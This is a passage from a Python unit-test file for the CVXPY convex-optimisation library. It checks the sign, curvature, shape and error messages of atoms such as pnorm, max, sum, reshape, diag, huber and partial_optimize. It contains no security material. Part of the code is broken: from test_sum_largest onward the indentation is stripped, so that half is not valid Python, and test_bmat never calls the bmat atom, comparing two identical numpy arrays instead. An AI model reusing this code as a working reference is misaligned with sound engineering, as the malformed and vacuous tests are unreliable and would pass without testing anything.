    self.assertEqual(atom.curvature, s.CONVEX)
    self.assertEqual(atom.sign, s.NONNEG)
    atom = cp.pnorm(self.x, p=2)
    self.assertEqual(atom.shape, tuple())
    self.assertEqual(atom.curvature, s.CONVEX)
    self.assertEqual(atom.sign, s.NONNEG)
    # axis argument: one norm per column of a (2, 2) matrix.
    expr = cp.norm(self.A, 2, axis=0)
    self.assertEqual(expr.shape, (2,))
    # p = infinity accepts several spellings.
    atom = cp.pnorm(self.x, p='inf')
    self.assertEqual(atom.shape, tuple())
    self.assertEqual(atom.curvature, s.CONVEX)
    self.assertEqual(atom.sign, s.NONNEG)
    atom = cp.pnorm(self.x, p='Inf')
    self.assertEqual(atom.shape, tuple())
    self.assertEqual(atom.curvature, s.CONVEX)
    self.assertEqual(atom.sign, s.NONNEG)
    atom = cp.pnorm(self.x, p=np.inf)
    self.assertEqual(atom.shape, tuple())
    self.assertEqual(atom.curvature, s.CONVEX)
    self.assertEqual(atom.sign, s.NONNEG)
    # p < 1: concave.
    atom = cp.pnorm(self.x, p=.5)
    self.assertEqual(atom.shape, tuple())
    self.assertEqual(atom.curvature, s.CONCAVE)
    self.assertEqual(atom.sign, s.NONNEG)
    atom = cp.pnorm(self.x, p=.7)
    self.assertEqual(atom.shape, tuple())
    self.assertEqual(atom.curvature, s.CONCAVE)
    self.assertEqual(atom.sign, s.NONNEG)
    atom = cp.pnorm(self.x, p=-.1)
    self.assertEqual(atom.shape, tuple())
    self.assertEqual(atom.curvature, s.CONCAVE)
    self.assertEqual(atom.sign, s.NONNEG)
    atom = cp.pnorm(self.x, p=-1)
    self.assertEqual(atom.shape, tuple())
    self.assertEqual(atom.curvature, s.CONCAVE)
    self.assertEqual(atom.sign, s.NONNEG)
    atom = cp.pnorm(self.x, p=-1.3)
    self.assertEqual(atom.shape, tuple())
    self.assertEqual(atom.curvature, s.CONCAVE)
    self.assertEqual(atom.sign, s.NONNEG)
    # Test copy with args=None
    copy = atom.copy()
    self.assertTrue(type(copy) is type(atom))
    # A new object is constructed, so copy.args == atom.args but copy.args
    # is not atom.args.
    self.assertEqual(copy.args, atom.args)
    self.assertFalse(copy.args is atom.args)
    self.assertEqual(copy.get_data(), atom.get_data())
    # Test copy with new args
    copy = atom.copy(args=[self.y])
    self.assertTrue(type(copy) is type(atom))
    self.assertTrue(copy.args[0] is self.y)
    self.assertEqual(copy.get_data(), atom.get_data())
def test_matrix_norms(self) -> None:
    """
    Matrix 1-norm, 2-norm (sigma_max), infinity-norm,
    Frobenius norm, and nuclear-norm.

    Fixes: seeded the RNG so the test is reproducible, and removed the
    dead trailing ``pass`` statement.
    """
    np.random.seed(0)  # reproducible random matrix values
    for p in [1, 2, np.inf, 'fro', 'nuc']:
        for var in [self.A, self.C]:
            atom = cp.norm(var, p)
            self.assertEqual(atom.shape, tuple())
            self.assertEqual(atom.curvature, s.CONVEX)
            self.assertEqual(atom.sign, s.NONNEG)
            # The atom's value must match numpy's matrix norm.
            var.value = np.random.randn(*var.shape)
            self.assertAlmostEqual(atom.value, np.linalg.norm(var.value, ord=p))
def test_quad_over_lin(self) -> None:
    """quad_over_lin DCP analysis and shape validation."""
    # Test quad_over_lin DCP.
    atom = cp.quad_over_lin(cp.square(self.x), self.a)
    self.assertEqual(atom.curvature, s.CONVEX)
    # Negated convex numerator is concave, but the composition stays convex.
    atom = cp.quad_over_lin(-cp.square(self.x), self.a)
    self.assertEqual(atom.curvature, s.CONVEX)
    # A concave numerator with unknown sign breaks the DCP rules.
    atom = cp.quad_over_lin(cp.sqrt(self.x), self.a)
    self.assertEqual(atom.curvature, s.UNKNOWN)
    assert not atom.is_dcp()
    # Test quad_over_lin shape validation.
    with self.assertRaises(Exception) as cm:
        cp.quad_over_lin(self.x, self.x)
    self.assertEqual(str(cm.exception),
                     "The second argument to quad_over_lin must be a scalar.")
def test_elemwise_arg_count(self) -> None:
    """Test arg count for max and min variants.

    Both maximum and minimum require at least two arguments; the accepted
    message differs between Python 2 and Python 3, hence the tuple.
    """
    with self.assertRaises(Exception) as cm:
        cp.maximum(1)
    self.assertTrue(str(cm.exception) in (
        "__init__() takes at least 3 arguments (2 given)",
        "__init__() missing 1 required positional argument: 'arg2'"))
    with self.assertRaises(Exception) as cm:
        cp.minimum(1)
    self.assertTrue(str(cm.exception) in (
        "__init__() takes at least 3 arguments (2 given)",
        "__init__() missing 1 required positional argument: 'arg2'"))
def test_matrix_frac(self) -> None:
    """Test for the matrix_frac atom.
    """
    atom = cp.matrix_frac(self.x, self.A)
    self.assertEqual(atom.shape, tuple())
    self.assertEqual(atom.curvature, s.CONVEX)
    # Test matrix_frac shape validation.
    # Second argument must be square.
    with self.assertRaises(Exception) as cm:
        cp.matrix_frac(self.x, self.C)
    self.assertEqual(str(cm.exception),
                     "The second argument to matrix_frac must be a square matrix.")
    # Vector length must match the matrix dimension.
    with self.assertRaises(Exception) as cm:
        cp.matrix_frac(Variable(3), self.A)
    self.assertEqual(str(cm.exception),
                     "The arguments to matrix_frac have incompatible dimensions.")
def test_max(self) -> None:
    """Test max.

    Sign of max over a single argument, axis/keepdims shapes, and the
    invalid-axis error.
    """
    # One arg, test sign.
    self.assertEqual(cp.max(1).sign, s.NONNEG)
    self.assertEqual(cp.max(-2).sign, s.NONPOS)
    self.assertEqual(cp.max(Variable()).sign, s.UNKNOWN)
    self.assertEqual(cp.max(0).sign, s.ZERO)
    # Test with axis argument.
    self.assertEqual(cp.max(Variable(2), axis=0, keepdims=True).shape, (1,))
    self.assertEqual(cp.max(Variable(2), axis=1).shape, (2,))
    self.assertEqual(cp.max(Variable((2, 3)), axis=0, keepdims=True).shape, (1, 3))
    self.assertEqual(cp.max(Variable((2, 3)), axis=1).shape, (2,))
    # Invalid axis.
    with self.assertRaises(Exception) as cm:
        cp.max(self.x, axis=4)
    self.assertEqual(str(cm.exception),
                     "Invalid argument for axis.")
def test_min(self) -> None:
    """Test min.

    Sign of min over a single argument, axis shapes, and the
    invalid-axis error.
    """
    # One arg, test sign.
    self.assertEqual(cp.min(1).sign, s.NONNEG)
    self.assertEqual(cp.min(-2).sign, s.NONPOS)
    self.assertEqual(cp.min(Variable()).sign, s.UNKNOWN)
    self.assertEqual(cp.min(0).sign, s.ZERO)
    # Test with axis argument.
    self.assertEqual(cp.min(Variable(2), axis=0).shape, tuple())
    self.assertEqual(cp.min(Variable(2), axis=1).shape, (2,))
    self.assertEqual(cp.min(Variable((2, 3)), axis=0).shape, (3,))
    self.assertEqual(cp.min(Variable((2, 3)), axis=1).shape, (2,))
    # Invalid axis.
    with self.assertRaises(Exception) as cm:
        cp.min(self.x, axis=4)
    self.assertEqual(str(cm.exception),
                     "Invalid argument for axis.")
# Test sign logic for maximum.
def test_maximum_sign(self) -> None:
    """Sign logic for the elementwise maximum atom.

    The sign of maximum is the "most positive" of its arguments' signs:
    one nonneg argument makes the result nonneg.
    """
    # Two args.
    self.assertEqual(cp.maximum(1, 2).sign, s.NONNEG)
    self.assertEqual(cp.maximum(1, Variable()).sign, s.NONNEG)
    self.assertEqual(cp.maximum(1, -2).sign, s.NONNEG)
    self.assertEqual(cp.maximum(1, 0).sign, s.NONNEG)
    self.assertEqual(cp.maximum(Variable(), 0).sign, s.NONNEG)
    self.assertEqual(cp.maximum(Variable(), Variable()).sign, s.UNKNOWN)
    self.assertEqual(cp.maximum(Variable(), -2).sign, s.UNKNOWN)
    self.assertEqual(cp.maximum(0, 0).sign, s.ZERO)
    self.assertEqual(cp.maximum(0, -2).sign, s.ZERO)
    self.assertEqual(cp.maximum(-3, -2).sign, s.NONPOS)
    # Many args.
    self.assertEqual(cp.maximum(-2, Variable(), 0, -1, Variable(), 1).sign,
                     s.NONNEG)
    # Promotion: a scalar is broadcast against a vector argument.
    self.assertEqual(cp.maximum(1, Variable(2)).sign,
                     s.NONNEG)
    self.assertEqual(cp.maximum(1, Variable(2)).shape,
                     (2,))
# Test sign logic for minimum.
def test_minimum_sign(self) -> None:
    """Sign logic for the elementwise minimum atom.

    The sign of minimum is the "most negative" of its arguments' signs:
    one nonpos argument makes the result nonpos.
    """
    # Two args.
    self.assertEqual(cp.minimum(1, 2).sign, s.NONNEG)
    self.assertEqual(cp.minimum(1, Variable()).sign, s.UNKNOWN)
    self.assertEqual(cp.minimum(1, -2).sign, s.NONPOS)
    self.assertEqual(cp.minimum(1, 0).sign, s.ZERO)
    self.assertEqual(cp.minimum(Variable(), 0).sign, s.NONPOS)
    self.assertEqual(cp.minimum(Variable(), Variable()).sign, s.UNKNOWN)
    self.assertEqual(cp.minimum(Variable(), -2).sign, s.NONPOS)
    self.assertEqual(cp.minimum(0, 0).sign, s.ZERO)
    self.assertEqual(cp.minimum(0, -2).sign, s.NONPOS)
    self.assertEqual(cp.minimum(-3, -2).sign, s.NONPOS)
    # Many args.
    self.assertEqual(cp.minimum(-2, Variable(), 0, -1, Variable(), 1).sign,
                     s.NONPOS)
    # Promotion: a scalar is broadcast against a vector argument.
    self.assertEqual(cp.minimum(-1, Variable(2)).sign,
                     s.NONPOS)
    self.assertEqual(cp.minimum(-1, Variable(2)).shape,
                     (2,))
def test_sum(self) -> None:
    """Test the sum atom.

    Sign/curvature/shape of sum, axis and keepdims handling, the
    invalid-axis error, and sparse-matrix input. (Removed a redundant
    duplicate ``A = sp.eye(3)`` assignment.)
    """
    self.assertEqual(cp.sum(1).sign, s.NONNEG)
    self.assertEqual(cp.sum(Constant([1, -1])).sign, s.UNKNOWN)
    self.assertEqual(cp.sum(Constant([1, -1])).curvature, s.CONSTANT)
    self.assertEqual(cp.sum(Variable(2)).sign, s.UNKNOWN)
    self.assertEqual(cp.sum(Variable(2)).shape, tuple())
    self.assertEqual(cp.sum(Variable(2)).curvature, s.AFFINE)
    self.assertEqual(cp.sum(Variable((2, 1)), keepdims=True).shape, (1, 1))
    # Mixed curvature: [1, -1] @ square(x) adds a convex and a concave term.
    mat = np.array([[1, -1]])
    self.assertEqual(cp.sum(mat @ cp.square(Variable(2))).curvature, s.UNKNOWN)
    # Test with axis argument.
    self.assertEqual(cp.sum(Variable(2), axis=0).shape, tuple())
    self.assertEqual(cp.sum(Variable(2), axis=1).shape, (2,))
    self.assertEqual(cp.sum(Variable((2, 3)), axis=0, keepdims=True).shape, (1, 3))
    self.assertEqual(cp.sum(Variable((2, 3)), axis=0, keepdims=False).shape, (3,))
    self.assertEqual(cp.sum(Variable((2, 3)), axis=1).shape, (2,))
    # Invalid axis.
    with self.assertRaises(Exception) as cm:
        cp.sum(self.x, axis=4)
    self.assertEqual(str(cm.exception),
                     "Invalid argument for axis.")
    # Sparse-matrix input: total sum and per-axis sums.
    A = sp.eye(3)
    self.assertEqual(cp.sum(A).value, 3)
    self.assertItemsAlmostEqual(cp.sum(A, axis=0).value, [1, 1, 1])
def test_multiply(self) -> None:
    """Test the multiply atom.

    Elementwise multiply: sign/curvature/shape with constants and
    parameters, plus scalar promotion on either side.
    """
    self.assertEqual(cp.multiply([1, -1], self.x).sign, s.UNKNOWN)
    self.assertEqual(cp.multiply([1, -1], self.x).curvature, s.AFFINE)
    self.assertEqual(cp.multiply([1, -1], self.x).shape, (2,))
    # Sign propagation through parameter products.
    pos_param = Parameter(2, nonneg=True)
    neg_param = Parameter(2, nonpos=True)
    self.assertEqual(cp.multiply(pos_param, pos_param).sign, s.NONNEG)
    self.assertEqual(cp.multiply(pos_param, neg_param).sign, s.NONPOS)
    self.assertEqual(cp.multiply(neg_param, neg_param).sign, s.NONNEG)
    # Negative weight flips convex square into a concave expression.
    self.assertEqual(cp.multiply(neg_param, cp.square(self.x)).curvature, s.CONCAVE)
    # Test promotion.
    self.assertEqual(cp.multiply([1, -1], 1).shape, (2,))
    self.assertEqual(cp.multiply(1, self.C).shape, self.C.shape)
    self.assertEqual(cp.multiply(self.x, [1, -1]).sign, s.UNKNOWN)
    self.assertEqual(cp.multiply(self.x, [1, -1]).curvature, s.AFFINE)
    self.assertEqual(cp.multiply(self.x, [1, -1]).shape, (2,))
# Test the vstack class.
def test_vstack(self) -> None:
    """vstack naming, shapes, and dimension-mismatch errors."""
    atom = cp.vstack([self.x, self.y, self.x])
    self.assertEqual(atom.name(), "Vstack(x, y, x)")
    # Three 2-vectors stack into a (3, 2) matrix.
    self.assertEqual(atom.shape, (3, 2))
    atom = cp.vstack([self.A, self.C, self.B])
    self.assertEqual(atom.name(), "Vstack(A, C, B)")
    # (2,2) + (3,2) + (2,2) rows -> (7, 2).
    self.assertEqual(atom.shape, (7, 2))
    # Stacking scalar entries of a vector.
    entries = []
    for i in range(self.x.shape[0]):
        entries.append(self.x[i])
    atom = cp.vstack(entries)
    self.assertEqual(atom.shape, (2, 1))
    # self.assertEqual(atom[1,0].name(), "vstack(x[0,0], x[1,0])[1,0]")
    # Mismatched trailing dimensions are rejected.
    with self.assertRaises(Exception) as cm:
        cp.vstack([self.C, 1])
    self.assertEqual(str(cm.exception),
                     "All the input dimensions except for axis 0 must match exactly.")
    with self.assertRaises(Exception) as cm:
        cp.vstack([self.x, Variable(3)])
    self.assertEqual(str(cm.exception),
                     "All the input dimensions except for axis 0 must match exactly.")
    # No arguments at all is a TypeError.
    with self.assertRaises(TypeError) as cm:
        cp.vstack()
def test_reshape(self) -> None:
    """Test the reshape class.

    Covers sign/curvature/shape preservation, the invalid-dimensions
    error, and C-ordered reshape round-trips through solved problems.
    """
    expr = cp.reshape(self.A, (4, 1))
    self.assertEqual(expr.sign, s.UNKNOWN)
    self.assertEqual(expr.curvature, s.AFFINE)
    self.assertEqual(expr.shape, (4, 1))
    expr = cp.reshape(expr, (2, 2))
    self.assertEqual(expr.shape, (2, 2))
    # Reshaping preserves sign and curvature of the argument.
    expr = cp.reshape(cp.square(self.x), (1, 2))
    self.assertEqual(expr.sign, s.NONNEG)
    self.assertEqual(expr.curvature, s.CONVEX)
    self.assertEqual(expr.shape, (1, 2))
    # Total number of entries must be preserved.
    with self.assertRaises(Exception) as cm:
        cp.reshape(self.C, (5, 4))
    self.assertEqual(str(cm.exception),
                     "Invalid reshape dimensions (5, 4).")
    # Test C-style reshape.
    a = np.arange(10)
    A_np = np.reshape(a, (5, 2), order='C')
    A_cp = cp.reshape(a, (5, 2), order='C')
    self.assertItemsAlmostEqual(A_np, A_cp.value)
    # Same reshape used as a constraint value in a solved problem.
    X = cp.Variable((5, 2))
    prob = cp.Problem(cp.Minimize(0), [X == A_cp])
    prob.solve()
    self.assertItemsAlmostEqual(A_np, X.value)
    # C-style flatten back to a vector.
    a_np = np.reshape(A_np, 10, order='C')
    a_cp = cp.reshape(A_cp, 10, order='C')
    self.assertItemsAlmostEqual(a_np, a_cp.value)
    x = cp.Variable(10)
    prob = cp.Problem(cp.Minimize(0), [x == a_cp])
    prob.solve()
    self.assertItemsAlmostEqual(a_np, x.value)
    # Test more complex C-style reshape: matrix to another matrix
    b = np.array([
        [0, 1, 2],
        [3, 4, 5],
        [6, 7, 8],
        [9, 10, 11],
    ])
    b_reshaped = b.reshape((2, 6), order='C')
    X = cp.Variable(b.shape)
    X_reshaped = cp.reshape(X, (2, 6), order='C')
    prob = cp.Problem(cp.Minimize(0), [X_reshaped == b_reshaped])
    prob.solve()
    self.assertItemsAlmostEqual(b_reshaped, X_reshaped.value)
    self.assertItemsAlmostEqual(b, X.value)
def test_vec(self) -> None:
    """Test the vec atom.

    vec flattens its argument to a 1-D expression, preserving sign and
    curvature.
    """
    expr = cp.vec(self.C)
    self.assertEqual(expr.sign, s.UNKNOWN)
    self.assertEqual(expr.curvature, s.AFFINE)
    # A (3, 2) matrix flattens to length 6.
    self.assertEqual(expr.shape, (6,))
    expr = cp.vec(self.x)
    self.assertEqual(expr.shape, (2,))
    # Scalar input yields a length-1 vector.
    expr = cp.vec(cp.square(self.a))
    self.assertEqual(expr.sign, s.NONNEG)
    self.assertEqual(expr.curvature, s.CONVEX)
    self.assertEqual(expr.shape, (1,))
def test_diag(self) -> None:
    """Test the diag atom.

    diag maps a vector to a diagonal matrix and a square matrix to its
    diagonal vector; non-square input is rejected. Also checks the
    PSD/NSD flags of constant diagonal matrices.
    """
    # Vector -> diagonal matrix.
    expr = cp.diag(self.x)
    self.assertEqual(expr.sign, s.UNKNOWN)
    self.assertEqual(expr.curvature, s.AFFINE)
    self.assertEqual(expr.shape, (2, 2))
    # Square matrix -> diagonal vector.
    expr = cp.diag(self.A)
    self.assertEqual(expr.sign, s.UNKNOWN)
    self.assertEqual(expr.curvature, s.AFFINE)
    self.assertEqual(expr.shape, (2,))
    # A transposed vector is still treated as a vector.
    expr = cp.diag(self.x.T)
    self.assertEqual(expr.sign, s.UNKNOWN)
    self.assertEqual(expr.curvature, s.AFFINE)
    self.assertEqual(expr.shape, (2, 2))
    # Constant PSD matrix: the diagonal is nonnegative.
    psd_matrix = np.array([[1, -1], [-1, 1]])
    expr = cp.diag(psd_matrix)
    self.assertEqual(expr.sign, s.NONNEG)
    self.assertEqual(expr.curvature, s.CONSTANT)
    self.assertEqual(expr.shape, (2,))
    with self.assertRaises(Exception) as cm:
        cp.diag(self.C)
    self.assertEqual(str(cm.exception),
                     "Argument to diag must be a vector or square matrix.")
    # Test that diag is PSD
    w = np.array([1.0, 2.0])
    expr = cp.diag(w)
    self.assertTrue(expr.is_psd())
    expr = cp.diag(-w)
    self.assertTrue(expr.is_nsd())
    # Mixed-sign diagonal is neither PSD nor NSD.
    expr = cp.diag(np.array([1, -1]))
    self.assertFalse(expr.is_psd())
    self.assertFalse(expr.is_nsd())
def test_trace(self) -> None:
    """trace of a square matrix is a scalar affine atom; non-square is rejected."""
    tr = cp.trace(self.A)
    self.assertEqual(tr.sign, s.UNKNOWN)
    self.assertEqual(tr.curvature, s.AFFINE)
    self.assertEqual(tr.shape, tuple())
    # self.C is (3, 2), so trace must raise.
    with self.assertRaises(Exception) as cm:
        cp.trace(self.C)
    self.assertEqual(str(cm.exception),
                     "Argument to trace must be a square matrix.")
def test_log1p(self) -> None:
    """log1p of a positive constant is nonneg; of a constant in (-1, 0), nonpos."""
    positive = cp.log1p(1)
    self.assertEqual(positive.sign, s.NONNEG)
    self.assertEqual(positive.curvature, s.CONSTANT)
    self.assertEqual(positive.shape, tuple())
    negative = cp.log1p(-0.5)
    self.assertEqual(negative.sign, s.NONPOS)
def test_upper_tri(self) -> None:
    """upper_tri rejects a non-square matrix argument."""
    # self.C is (3, 2), so upper_tri must raise.
    with self.assertRaises(Exception) as cm:
        cp.upper_tri(self.C)
    self.assertEqual(str(cm.exception),
                     "Argument to upper_tri must be a square matrix.")
def test_vec_to_upper_tri(self) -> None:
    """vec_to_upper_tri packs a vector into an upper-triangular matrix.

    With strict=False the diagonal is filled; with strict=True entries go
    strictly above the diagonal.
    """
    from cvxpy.atoms.affine.upper_tri import vec_to_upper_tri
    # Non-strict: 3 entries fill a 2x2 upper triangle including diagonal.
    x = Variable(shape=(3,))
    X = vec_to_upper_tri(x)
    x.value = np.array([1, 2, 3])
    actual = X.value
    expect = np.array([[1, 2], [0, 3]])
    assert np.allclose(actual, expect)
    # Strict: a single entry fills the one strictly-upper slot of a 2x2.
    y = Variable(shape=(1,))
    y.value = np.array([4])
    Y = vec_to_upper_tri(y, strict=True)
    actual = Y.value
    expect = np.array([[0, 4], [0, 0]])
    assert np.allclose(actual, expect)
    # Strict, constant input: 6 entries fill a 4x4 strictly-upper triangle.
    A_expect = np.array([[0, 11, 12, 13],
                         [0, 0, 16, 17],
                         [0, 0, 0, 21],
                         [0, 0, 0, 0]])
    a = np.array([11, 12, 13, 16, 17, 21])
    A_actual = vec_to_upper_tri(a, strict=True).value
    assert np.allclose(A_actual, A_expect)
def test_huber(self) -> None:
    """Huber atom: M validation (constant and Parameter) and copy() behavior."""
    # Valid.
    cp.huber(self.x, 1)
    # Negative M is rejected.
    with self.assertRaises(Exception) as cm:
        cp.huber(self.x, -1)
    self.assertEqual(str(cm.exception),
                     "M must be a non-negative scalar constant.")
    # Non-scalar M is rejected.
    with self.assertRaises(Exception) as cm:
        cp.huber(self.x, [1, 1])
    self.assertEqual(str(cm.exception),
                     "M must be a non-negative scalar constant.")
    # M parameter.
    M = Parameter(nonneg=True)
    # Valid.
    cp.huber(self.x, M)
    M.value = 1
    # huber(2) with M=1 evaluates to 2*|2| - M^2 = 3.
    self.assertAlmostEqual(cp.huber(2, M).value, 3)
    # Invalid: a nonpos Parameter cannot serve as M.
    M = Parameter(nonpos=True)
    with self.assertRaises(Exception) as cm:
        cp.huber(self.x, M)
    self.assertEqual(str(cm.exception),
                     "M must be a non-negative scalar constant.")
    # Test copy with args=None
    atom = cp.huber(self.x, 2)
    copy = atom.copy()
    self.assertTrue(type(copy) is type(atom))
    # A new object is constructed, so copy.args == atom.args but copy.args
    # is not atom.args.
    self.assertEqual(copy.args, atom.args)
    self.assertFalse(copy.args is atom.args)
    # As get_data() returns a Constant, we have to check the value
    self.assertEqual(copy.get_data()[0].value, atom.get_data()[0].value)
    # Test copy with new args
    copy = atom.copy(args=[self.y])
    self.assertTrue(type(copy) is type(atom))
    self.assertTrue(copy.args[0] is self.y)
    self.assertEqual(copy.get_data()[0].value, atom.get_data()[0].value)
def test_sum_largest(self) -> None:
"""Test the sum_largest atom and related atoms.
"""
with self.assertRaises(Exception) as cm:
cp.sum_largest(self.x, -1)
self.assertEqual(str(cm.exception),
"Second argument must be a positive integer.")
with self.assertRaises(Exception) as cm:
cp.lambda_sum_largest(self.x, 2.4)
self.assertEqual(str(cm.exception),
"First argument must be a square matrix.")
with self.assertRaises(Exception) as cm:
cp.lambda_sum_largest(Variable((2, 2)), 2.4)
self.assertEqual(str(cm.exception),
"Second argument must be a positive integer.")
with self.assertRaises(ValueError) as cm:
cp.lambda_sum_largest([[1, 2], [3, 4]], 2).value
self.assertEqual(str(cm.exception),
"Input matrix was not Hermitian/symmetric.")
# Test copy with args=None
atom = cp.sum_largest(self.x, 2)
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with new args
copy = atom.copy(args=[self.y])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is self.y)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with lambda_sum_largest, which is in fact an AddExpression
atom = cp.lambda_sum_largest(Variable((2, 2)), 2)
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
def test_sum_smallest(self) -> None:
"""Test the sum_smallest atom and related atoms.
"""
with self.assertRaises(Exception) as cm:
cp.sum_smallest(self.x, -1)
self.assertEqual(str(cm.exception),
"Second argument must be a positive integer.")
with self.assertRaises(Exception) as cm:
cp.lambda_sum_smallest(Variable((2, 2)), 2.4)
self.assertEqual(str(cm.exception),
"Second argument must be a positive integer.")
def test_index(self) -> None:
"""Test the copy function for index.
"""
# Test copy with args=None
shape = (5, 4)
A = Variable(shape)
atom = A[0:2, 0:1]
copy = atom.copy()
self.assertTrue(type(copy) is type(atom))
# A new object is constructed, so copy.args == atom.args but copy.args
# is not atom.args.
self.assertEqual(copy.args, atom.args)
self.assertFalse(copy.args is atom.args)
self.assertEqual(copy.get_data(), atom.get_data())
# Test copy with new args
B = Variable((4, 5))
copy = atom.copy(args=[B])
self.assertTrue(type(copy) is type(atom))
self.assertTrue(copy.args[0] is B)
self.assertEqual(copy.get_data(), atom.get_data())
def test_bmat(self) -> None:
"""Test the bmat atom.
"""
v_np = np.ones((3, 1))
expr = np.vstack([np.hstack([v_np, v_np]),
np.hstack([np.zeros((2, 1)),
np.array([[1, 2]]).T])])
self.assertEqual(expr.shape, (5, 2))
const = np.vstack([np.hstack([v_np, v_np]),
np.hstack([np.zeros((2, 1)),
np.array([[1, 2]]).T])])
self.assertItemsAlmostEqual(expr, const)
def test_conv(self) -> None:
"""Test the conv atom.
"""
a = np.ones((3, 1))
b = Parameter(2, nonneg=True)
expr = cp.conv(a, b)
assert expr.is_nonneg()
self.assertEqual(expr.shape, (4, 1))
b = Parameter(2, nonpos=True)
expr = cp.conv(a, b)
assert expr.is_nonpos()
with self.assertRaises(Exception) as cm:
cp.conv(self.x, -1)
self.assertEqual(str(cm.exception),
"The first argument to conv must be constant.")
with self.assertRaises(Exception) as cm:
cp.conv([[0, 1], [0, 1]], self.x)
self.assertEqual(str(cm.exception),
"The arguments to conv must resolve to vectors.")
def test_kron(self) -> None:
"""Test the kron atom.
"""
a = np.ones((3, 2))
b = Parameter((2, 1), nonneg=True)
expr = cp.kron(a, b)
assert expr.is_nonneg()
self.assertEqual(expr.shape, (6, 2))
b = Parameter((2, 1), nonpos=True)
expr = cp.kron(a, b)
assert expr.is_nonpos()
with self.assertRaises(Exception) as cm:
cp.kron(self.x, -1)
self.assertEqual(str(cm.exception),
"The first argument to kron must be constant.")
def test_partial_optimize_dcp(self) -> None:
"""Test DCP properties of partial optimize.
"""
# Evaluate the 1-norm in the usual way (i.e., in epigraph form).
dims = 3
x, t = Variable(dims), Variable(dims)
p2 = Problem(cp.Minimize(cp.sum(t)), [-t <= x, x <= t])
g = partial_optimize(p2, [t], [x])
self.assertEqual(g.curvature, s.CONVEX)
p2 = Problem(cp.Maximize(cp.sum(t)), [-t <= x, x <= t])
g = partial_optimize(p2, [t], [x])
self.assertEqual(g.curvature, s.CONCAVE)
p2 = Problem(cp.Maximize(cp.square(t[0])), [-t <= x, x <= t])
g = partial_optimize(p2, [t], [x])
self.assertEqual(g.is_convex(), False)
self.assertEqual(g.is_concave(), False)
def test_partial_optimize_eval_1norm(self) -> None:
"""Test the partial_optimize atom.
"""
# Evaluate the 1-norm in the usual way (i.e., in epigraph form).
dims = 3
x, t = Variable(dims), Variable(dims)
xval = [-5]*dims
p1 = Problem(cp.Minimize(cp.sum(t)), [-t <= xval, xval <= t])
p1.solve()
# Minimize the 1-norm via partial_optimize.
p2 = Problem(cp.Minimize(cp.sum(t)), [-t <= x, x <= t])
g = partial_optimize(p2, [t], [x])
p3 = Problem(cp.Minimize(g), [x == xval])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
# Minimize the 1-norm using maximize.
p2 = Problem(cp.Maximize(cp.sum(-t)), [-t <= x, x <= t])
g = partial_optimize(p2, opt_vars=[t])
p3 = Problem(cp.Maximize(g), [x == xval])
p3.solve()
self.assertAlmostEqual(p1.value, -p3.value)
# Try leaving out args.
# Minimize the 1-norm via partial_optimize.
p2 = Problem(cp.Minimize(cp.sum(t)), [-t <= x, x <= t])
g = partial_optimize(p2, opt_vars=[t])
p3 = Problem(cp.Minimize(g), [x == xval])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
# Minimize the 1-norm via partial_optimize.
g = partial_optimize(p2, dont_opt_vars=[x])
p3 = Problem(cp.Minimize(g), [x == xval])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
with self.assertRaises(Exception) as cm:
g = partial_optimize(p2)
self.assertEqual(str(cm.exception),
"partial_optimize called with neither opt_vars nor dont_opt_vars.")
with self.assertRaises(Exception) as cm:
g = partial_optimize(p2, [], [x])
self.assertEqual(str(cm.exception),
("If opt_vars and new_opt_vars are both specified, "
"they must contain all variables in the problem.")
)
def test_partial_optimize_min_1norm(self) -> None:
# Minimize the 1-norm in the usual way
dims = 3
x, t = Variable(dims), Variable(dims)
p1 = Problem(Minimize(cp.sum(t)), [-t <= x, x <= t])
# Minimize the 1-norm via partial_optimize
g = partial_optimize(p1, [t], [x])
p2 = Problem(Minimize(g))
p2.solve()
p1.solve()
self.assertAlmostEqual(p1.value, p2.value)
def test_partial_optimize_simple_problem(self) -> None:
x, y = Variable(1), Variable(1)
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(x+y), [x+y >= 3, y >= 4, x >= 5])
p1.solve()
# Solve the two-stage problem via partial_optimize
p2 = Problem(Minimize(y), [x+y >= 3, y >= 4])
g = partial_optimize(p2, [y], [x])
p3 = Problem(Minimize(x+g), [x >= 5])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
@unittest.skipUnless(len(INSTALLED_MI_SOLVERS) > 0, 'No mixed-integer solver is installed.')
def test_partial_optimize_special_var(self) -> None:
x, y = Variable(boolean=True), Variable(integer=True)
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(x+y), [x+y >= 3, y >= 4, x >= 5])
p1.solve(solver=cp.ECOS_BB)
# Solve the two-stage problem via partial_optimize
p2 = Problem(Minimize(y), [x+y >= 3, y >= 4])
g = partial_optimize(p2, [y], [x])
p3 = Problem(Minimize(x+g), [x >= 5])
p3.solve(solver=cp.ECOS_BB)
self.assertAlmostEqual(p1.value, p3.value)
def test_partial_optimize_special_constr(self) -> None:
x, y = Variable(1), Variable(1)
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(x + cp.exp(y)), [x+y >= 3, y >= 4, x >= 5])
p1.solve()
# Solve the two-stage problem via partial_optimize
p2 = Problem(Minimize(cp.exp(y)), [x+y >= 3, y >= 4])
g = partial_optimize(p2, [y], [x])
p3 = Problem(Minimize(x+g), [x >= 5])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
def test_partial_optimize_params(self) -> None:
"""Test partial optimize with parameters.
"""
x, y = Variable(1), Variable(1)
gamma = Parameter()
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(x+y), [x+y >= gamma, y >= 4, x >= 5])
gamma.value = 3
p1.solve()
# Solve the two-stage problem via partial_optimize
p2 = Problem(Minimize(y), [x+y >= gamma, y >= 4])
g = partial_optimize(p2, [y], [x])
